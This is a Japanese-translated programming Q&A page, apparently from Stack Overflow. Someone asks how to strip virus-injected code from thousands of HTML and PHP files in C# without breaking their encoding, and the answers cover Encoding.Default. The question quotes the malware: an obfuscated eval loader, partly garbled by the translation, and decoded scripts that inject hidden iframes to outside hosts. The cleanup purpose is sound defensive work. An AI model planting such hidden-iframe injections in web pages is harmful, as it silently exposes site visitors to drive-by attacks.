2012-02-09 5 views
6

私は5000個のファイルを.htmlと.phpファイルとしてFTPからダウンロードする必要があります。私は各ファイルを読んで、ウィルスによってそこに置かれたいくつかのものを取り除き、それをFTPに戻す必要があります。C#でのエンコーディングを知らなくても、小さな変更を加えてファイルを読み書きすることはできますか?

私は、次のコードを使用しています:

string content; 
using (StreamReader sr = new StreamReader(fileName, System.Text.Encoding.UTF8, true)) { 
    content = sr.ReadToEnd(); 
    sr.Close(); 
} 

using (StreamWriter sw = new StreamWriter(fileName + "1" + file.Extension, false, System.Text.Encoding.UTF8)) 
{ 
    sw.WriteLine(content); 
    sw.Close(); 
} 

は、私は手でいくつかのファイルをダウンロードし、いくつかは <meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />を持っているが、私はそれらのすべてがそのようにしていると仮定したいとは思わないでしょう。私はメモ帳でチェックしました++といくつかのテキストファイルはANSIです。 PHPはUTF-8とHTML Windows-1250のようですが、修正しようとしている間にファイルを破壊しないようにしたいと考えています。だから、私はエンコーディングを知らない/推測する必要がなく、ウェブページからウイルスリンクを削除する方法があるのですか?

編集。 ; {document.rvwrew.vewr}キャッチ(q)をしてみてください{R = 1; C =文字列;}もし

VAR S =新 文字列():私はこのような何かを見つけて削除しようとしています(r & & document.createTextNode)u = 2; e = eval; m = [4.5 * u、18/u、52.5 * u、204/u、16 * u、80/u、50 * u、222/u 、49.5 * u、234/u、54.5 * u、202/u、55 * u、232/u、23 * u、206/u、50.5 * u、232/u、34.5 * u、216/u、50.5 * u、218/u、50.5 * u、220/u、58 * u、230/u、33 * u、242/u、42 * u、194/u、51.5 * u、156/u、48.5 * u 185/u、19.5/u、55.5 * u、200/u、60.5 * u、78/u、20.5 * u、182/u、24 * u、186 /u,20.5*u,246/u,4.5*u,18/u,4.5*u,210/u,51uu228/u,48.5*u,218/u,50.5*u,228/u 、20 * u、82/u、29.5 * u、18/u、4.5 * u、250/u、16 * u、202/u、54 * u、230/u、50.5 * u、64/u、61.5 * u、18/u、4.5 * u、18/u、50 * u、222/u、49.5 * u、234/u、54.5 * u、202/u、55 * u、232/u、23 * u 51 * u、228/u、48.5 * u、u *、u *、u *、u * 58 * u、232/u、56 * u、116/u、50.5 * u、64/u、57.5 * u、228/u、49.5 * u、122/u、19.5 * 49.5u、232.5u、232.5u、232.5u、232.5u、232u、232u、 56.5u、232.5u、232.5u、232.5u、232.5u、232.5u、232.5u、232.5u、 202 * u、232 * u、52 * u、224/u、19 * 51.5 * u、208/u、58 * u、122/u、19.5 * u、98/u、24 * u、78/u、16 * u、208/u、50.5 * 54 * u、202/u、30.5 * u、78/u、19.5 * u、98/u、24 * u、78/u、16 * u、230/u、 59 * u、210/u、57.5 * u、210/u、49 * u、210/u、54 * u、210/u、58 * u、242/u、29 * u、208/u、52.5 56 * u、222/u、57.5 * u、210/u、58 * u、210/u、55.5 * u 202/u、29 * u、194/u、49 * u、230/u、55.5 * u、216/u、58.5 * u、232/u、50.5 * u、118/u、54 * u、202 /u,51*u,232/u,29*u,96/u,29.5*u,232/u,55.5*u,224/u,29*u,96/u,29.5uu78/u 、51 * u、228/u、48.5 * u、218/u、50.5 * u、124/u、17 * u、82/u、29.5 58 * u、210/u、55.5 * u、18/u、4.5 * u、250/u、4.5 * u、18/u、51 * u、234/u、 220/u、16 * u、210/u、51 * u、228/u、48.5 * u、218/u、50.5 * u、228/u、20 * u、82/u、61.5 * u、18 /u,4.5*u,18/u、 50 * u、222/u、49.5 * u、234/u、54.5 * u、194/u、57 * u、64/u、51 * u、64/u、30.5 * 48.5 * u、232/u、50.5 * u、138/u、54 * u、202 * u、 52.5 * u、204/u、57 * u、194/u、54.5 * u、202/u、54.5 * u、202/u、55 * u、232/u、 232.5/u、232/u、58 * u、228/u、19.5 * u、82/u、29.5 * u、204/u、23 * u、230/u、50.5 * 19.5 * u、88/u、19.5 * u、195 * u、195 * u、195 * 51 * u、210/u、49 * u、202/u、57 * u、208 * u、58 * u、232/u、56 * u、116/u、23.5 * 218.5/u、23.5 * u、232/u、50.5 * u、218/u、57.5 * u、232/u、48.5 * u、232/u、23 * 54 * u、232/u、23 * u、224/u、52 * u、224/u、19.5 * u、82/u、 29.5 * u、204/u、 23 * u、230/u、58 * u、242/u、54 * u、202/u、23 * u、236/u、52.5 * u、230/u、52.5 52.5 * u、232/u、60.5 * u、122/u、19.5 * u、208/u、52.5 * u、200/u、50 * u 54 * u、202/u、23 * u、224のような、それぞれ、202/u、55 * u、78/u、29.5 * u、204/u、23 * u、230/u、 /u,55.5*u,230/u,52.5*u,232/u,52.5*u,222/u,55uu122/u,19.5*u194/u,49*u,230/u 53.5 * u、204/u、23 * u、230/u、58 * u、242/u、55.5 * u、216/u、58.5 * u、232/u、50.5 * u、78/19.5 * u、118/u、51 * u、202/u、23 * u、216/u、50.5 * u、204/u、58 * u、122/56 * u、122/u、19.5 * u、92/u、57.5 * u、232/u、60.5 * u、216/u、50.5 * u、92/u、 58 * u、232/u、57 * u、210/u、195 * u、19.5 * u、118/u、51 * u、92/u、57.5 * 52 * u、78/u、59.5 * u、210/u、50 * u、232/u、52 * u、78/u、 19.5 * u、82.5u、29.5 * u、204/u、23 * u、230/u、50.5 * u、232/u、32.5 * u、78/u、24.5 * 52.5 * u、196/u、58.5 * u、232/u、50.5 * u、80/u、19.5 * u、208/u、50.5 * u、 78/u、22 * u、78/u、24.5 * u、96/u、19.5 * u、82/u、29.5 * u、18/55 * u、232/u、23 * u、206/u、4.5 * u、18/u、50 * u、222/u、49.5 * u、234/u、54.5 * u、202/u、 33 * u、242/u、42 *、u *、u *、u *、u * 51.5 * u、156/u、48.5 * u、218/u、50.5 * u、80/u、19.5 * u、196/u、55。56 * u、224/u、50.5 * 5 * u、200/u、60.5 * u、78/u、20.5 * u、182/u、24 * u、186/u、 200 * u、202/u、50 * u、134/u、52 * u、210/u、54 * u、200/u、20 * (i = 0; i!= m.length; i ++)s + = mm(e( "m" + "[復号後

if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    document.write(""); 
} 
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://fiberastat.com/temp/stat.php'); 
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
} 

ある

"+" I "+ ']'));試みる{doc.qwe.removeChild()}キャッチ(Q){E(S)}また、ウェブページにアクセスすると、これを(解読後に)伝えます。

if (document.getElementsByTagName('body')[0]) { 
    iframer(); 
} else { 
    document.write(""); 
} 
function iframer() { 
    var f = document.createElement('iframe'); 
    f.setAttribute('src', 'http://vtempe.in/in.cgi?17'); 
    f.style.visibility = 'hidden'; 
    f.style.position = 'absolute'; 
    f.style.left = '0'; 
    f.style.top = '0'; 
    f.setAttribute('width', '10'); 
    f.setAttribute('height', '10'); 
    document.getElementsByTagName('body')[0].appendChild(f); 
} 

スクリプトは、最後の3行に追加され、基本的には右</html> VAR

後に開始されたPHPスクリプトは、ライン<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>の多かれ少なかれ、このタイプを持っていますが、それは、ファイル内の任意の場所にすることができます。

これらのファイルを書き換える方法が他にあるかどうかはわかりません。しかし、5000個のファイルを通過する必要があります:-)

+0

ファイルを変更している場合は、エンコーディングを知っている必要があります。そうしないと、実際にファイルを破損することが保証されます。 – Dave

+0

ちょっと考えましたが、ウイルスがアップロードされる前に、アップロードされたオリジナルまたはバックアップのいずれかから、これらのファイルのクリーンなバージョンはありませんか?もしそうでなければ、それは前進することについて考えるべきことです。 –

+0

いいえ、新しい顧客は今日私に連絡し、基本的に彼が持っているのは2種類のエントリを持つファイルの束だけです。私は 'problematic code'で質問を更新しました。 – MadBoy

答えて

3

ファイルがUTF16またはUTF32でなく、対話したい部分が完全に7ビットASCIIであると仮定すると、それを開いて、Encoding.Defaultという名前で保存すると、上位の文字を正しく往復させることができます。

+0

私は質問を更新しました。 Encoding.Defaultを使用してパーツを実行可能にする必要があります。私はそれを試してみます – MadBoy

+0

これはうまくトリックを行います。ありがとう! – MadBoy

1

ウイルスは、その内容をファイルに追加するためにファイルエンコーディングを知る必要はないため、明らかに可能です。ファイルをテキストとして扱うのではなく、バイナリファイルとして処理し、ウイルスが追加したものと一致するパターンを検索できませんでしたか?

+0

私は分かりません。私は削除する必要のあるコードで質問を更新しました。 – MadBoy

関連する問題